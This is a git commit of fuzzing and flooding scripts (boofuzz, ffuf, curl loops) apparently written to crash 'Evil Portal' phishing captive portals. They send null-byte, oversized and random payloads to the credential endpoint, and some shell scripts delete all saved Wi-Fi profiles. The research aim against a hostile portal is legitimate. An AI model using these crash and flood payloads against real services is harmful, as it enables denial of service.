initial commit
This commit is contained in:
@@ -0,0 +1,45 @@
|
||||
from boofuzz import *
|
||||
import datetime
|
||||
import time
|
||||
|
||||
def main():
|
||||
port = 80
|
||||
# host = '10.0.0.80'
|
||||
host = '192.168.4.1'
|
||||
file_tag = 'Marauder-CYD'
|
||||
# web_interface_listen='0.0.0.0'
|
||||
web_interface_listen='10.0.0.79'
|
||||
web_interface_listen_port=26000
|
||||
currenttime = datetime.datetime.now()
|
||||
ct = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
output_filename=f"./boofuzz-results/{file_tag}-{ct}.db"
|
||||
session_persistsant_filename=f"./boofuzz-results/session-save-{file_tag}-{ct}.dat"
|
||||
|
||||
session = Session(
|
||||
target=Target(connection=TCPSocketConnection(host, port)),
|
||||
receive_data_after_fuzz=True,
|
||||
web_address=web_interface_listen,
|
||||
web_port=web_interface_listen_port,
|
||||
db_filename=output_filename,
|
||||
session_filename=session_persistsant_filename,
|
||||
sleep_time=0.225
|
||||
)
|
||||
|
||||
s_initialize(name="Request")
|
||||
with s_block("Request-Line"):
|
||||
s_group("http-method", ["GET", "HEAD", "POST"])
|
||||
s_static(" ", "space-0")
|
||||
s_static("/get?email=", name="uri-start")
|
||||
s_string("email", name="emailvar")
|
||||
s_static("&password=", name="password")
|
||||
s_string("password", name="passwordvar")
|
||||
s_static(" ", "space-1")
|
||||
s_static("HTTP/1.1", "http-version")
|
||||
s_static("\r\n\r\n", "Request-CRLF")
|
||||
|
||||
session.connect(s_get("Request"))
|
||||
session.fuzz()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#!/bin/bash
|
||||
wifi_device=wlan1
|
||||
ssid=Guest-WiFi
|
||||
# password=
|
||||
# deletei=True
|
||||
|
||||
echo "Interface $wifi_device"
|
||||
echo "Disconnecting"
|
||||
sudo nmcli d disconnect $wifi_device
|
||||
|
||||
if [ ! -z $deletei ]; then
|
||||
echo "Deleting Wifi Profiles"
|
||||
sudo nmcli connection show | sudo awk '{system("nmcli connection delete " $1)}'
|
||||
echo "Sleeping 3 Seconds"
|
||||
sleep 3
|
||||
fi
|
||||
|
||||
sudo nmcli dev wifi rescan
|
||||
|
||||
echo "Connecting to $ssid"
|
||||
if [ -z $password ]; then
|
||||
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||
else
|
||||
sudo nmcli device wifi connect $ssid password $password ifname $wifi_device
|
||||
fi
|
||||
|
||||
ifconfig $wifi_device
|
||||
@@ -0,0 +1,6 @@
|
||||
wifi_device=wlan1
|
||||
echo "Interface $wifi_device"
|
||||
echo "Disconnecting"
|
||||
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||
echo "Deleting Wifi Profiles"
|
||||
sudo nmcli connection show | sudo awk '{system("nmcli connection delete " $1)}' > /dev/null
|
||||
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
wifi_device=wlan1
|
||||
ssid=Guest-WiFi
|
||||
host="192.168.4.1"
|
||||
|
||||
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
|
||||
|
||||
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||
|
||||
sudo nmcli dev wifi rescan > /dev/null
|
||||
|
||||
echo -e "\nCashing This Evil Portal With No Survivors\n"
|
||||
|
||||
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||
|
||||
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
|
||||
|
||||
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
|
||||
|
||||
echo -e "\n\nPinging To Confirm Kill...\n"
|
||||
ping -c 4 $host
|
||||
|
||||
echo -e "\nThat Was Big Payload (4U)\nRIP"
|
||||
@@ -0,0 +1,18 @@
|
||||
import subprocess
|
||||
|
||||
# host = "http://192.168.4.1"
|
||||
host = "http://10.0.0.80"
|
||||
charlen = 2000
|
||||
char = "%FF"
|
||||
|
||||
curl_cmd = "curl --silent"
|
||||
|
||||
payload = char*charlen
|
||||
uri = f"{host}/get.php?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}'"
|
||||
print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print("That's A Big Load (4U)\n\nDone")
|
||||
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
wifi_device=wlan1
|
||||
ssid=Guest-WiFi
|
||||
host="192.168.4.1"
|
||||
|
||||
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
|
||||
|
||||
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||
|
||||
sudo nmcli dev wifi rescan > /dev/null
|
||||
|
||||
echo -e "\nCashing This Evil Portal With No Survivors\n"
|
||||
|
||||
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||
|
||||
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
|
||||
|
||||
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
|
||||
|
||||
echo -e "\n\nPinging To Confirm Kill...\n"
|
||||
ping -c 4 $host
|
||||
|
||||
echo -e "\nThat Was Big Payload (4U)\nRIP"
|
||||
@@ -0,0 +1,7 @@
|
||||
ffuf -w Metacharacters.fuzzdb.txt -u "http://172.0.0.1/get?email=FUZZ\&password=%00%00" -H "FUZZ:FUZZ" -mc all -ac -rate 60
|
||||
curl -i "http://192.168.4.1/get?email=one%00one\&password=two%00two" #-i dumps headers
|
||||
curl -i --raw "http://192.168.4.1/get?email=one%00one\&password=two`printf \0`two"
|
||||
ffuf -w /usr/share/wordlists/john.lst -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 60
|
||||
ffuf -w /usr/share/wordlists/john.lst -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 1
|
||||
ffuf -w /usr/share/wordlists/seclists/Fuzzing/big-list-of-naughty-strings.txt -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 1
|
||||
ffuf -w /usr/share/wordlists/seclists/Fuzzing/big-list-of-naughty-strings.txt -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 2
|
||||
@@ -0,0 +1,3 @@
|
||||
|
||||
|
||||
Chars: %00*1489 - Prepend: - Append:
|
||||
Binary file not shown.
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,40 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
# host = "10.0.0.80"
|
||||
host = "192.168.4.1"
|
||||
|
||||
rangei = 65536 # FFFF+1
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
for x in range(rangei):
|
||||
hexcode = hex(x)[2:]
|
||||
if x > 255:
|
||||
urlformatted_raw = "%{:04x}".format(x)
|
||||
hexformatted_raw = "0x{:04x}".format(x)
|
||||
urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}"
|
||||
else:
|
||||
urlformatted_raw = "%{:04x}".format(x)
|
||||
urlformatted = "%{:02x}".format(x)
|
||||
hexformatted = "0x{:02x}".format(x)
|
||||
unicode_formatted = "%u{:04x}".format(x)
|
||||
printformatted = f"\\x{hexcode}"
|
||||
|
||||
print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}")
|
||||
p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
|
||||
(output, err) = p.communicate()
|
||||
(output, err) = p1.communicate()
|
||||
(output, err) = p2.communicate()
|
||||
|
||||
p_status = p.wait()
|
||||
p_status1 = p1.wait()
|
||||
p_status2 = p2.wait()
|
||||
|
||||
time.sleep(0.225)
|
||||
print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt")
|
||||
@@ -0,0 +1,42 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
host = "http://10.0.0.80"
|
||||
# host = "http://192.168.4.1"
|
||||
charlen = 1489
|
||||
char = "%00"
|
||||
prepend = ""
|
||||
append = ""
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt"
|
||||
|
||||
# -i, --include - include header in output
|
||||
# -I, --head - HEAD http method
|
||||
# -s, --silent - supresses progress and errors
|
||||
# -S, --show-error - when used with -s/--silent, displays errors
|
||||
# -D <file>, --dump-header <file> - saves response headers to <file>
|
||||
# -f, --fail - fail silently on HTTP error
|
||||
# -X, --request - request method, defaults to GET
|
||||
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
|
||||
# -v, --verbose - show request headers
|
||||
# -o <file>, --output <file> - write output to file
|
||||
|
||||
# curl_cmd = "curl -i -s -S -v"
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
chars = char*charlen
|
||||
payload = f"{prepend}{chars}{append}"
|
||||
uri = f"{host}/get.php?email={payload}&password=holdstill"
|
||||
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
||||
print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}")
|
||||
with open(outfile, "a") as log:
|
||||
log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print(f"\n\nlog written to {outfile}")
|
||||
@@ -0,0 +1,45 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
# host = "http://10.0.0.80"
|
||||
host = "http://192.168.4.1"
|
||||
rangei = 10000
|
||||
char = "X"
|
||||
# char = "%00"
|
||||
prepend = ""
|
||||
append = ""
|
||||
#append = "%0a%00%0a"
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt"
|
||||
|
||||
# -i, --include - include header in output
|
||||
# -I, --head - HEAD http method
|
||||
# -s, --silent - supresses progress and errors
|
||||
# -S, --show-error - when used with -s/--silent, displays errors
|
||||
# -D <file>, --dump-header <file> - saves response headers to <file>
|
||||
# -f, --fail - fail silently on HTTP error
|
||||
# -X, --request - request method, defaults to GET
|
||||
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
|
||||
# -v, --verbose - show request headers
|
||||
# -o <file>, --output <file> - write output to file
|
||||
|
||||
# curl_cmd = "curl -i -s -S -v"
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
for x in range(rangei+1):
|
||||
chars = char*x
|
||||
payload = f"{prepend}{chars}{append}"
|
||||
uri = f"{host}/get?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
||||
print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\n\Outfile: {outfile}\n")
|
||||
with open(outfile, "a") as log:
|
||||
log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print(f"\n\nlog written to {outfile}")
|
||||
@@ -0,0 +1 @@
|
||||
source boofuzz/env/bin/activate
|
||||
@@ -0,0 +1,24 @@
|
||||
import subprocess
|
||||
import os
|
||||
# from requests.utils import requote_uri
|
||||
import urllib.parse
|
||||
from random import randbytes
|
||||
|
||||
host = "http://192.168.4.1"
|
||||
# host = "http://10.0.0.80"
|
||||
rangei = 10000
|
||||
# charlen = 4*400
|
||||
charlen = 128
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
for x in range(rangei+1):
|
||||
payload = urllib.parse.quote(randbytes(charlen))
|
||||
uri = f"{host}/get?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}'"
|
||||
|
||||
print(f"{x} of {rangei} sets of {charlen} random bytes")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print(f"\n\nThe End")
|
||||
Reference in New Issue
Block a user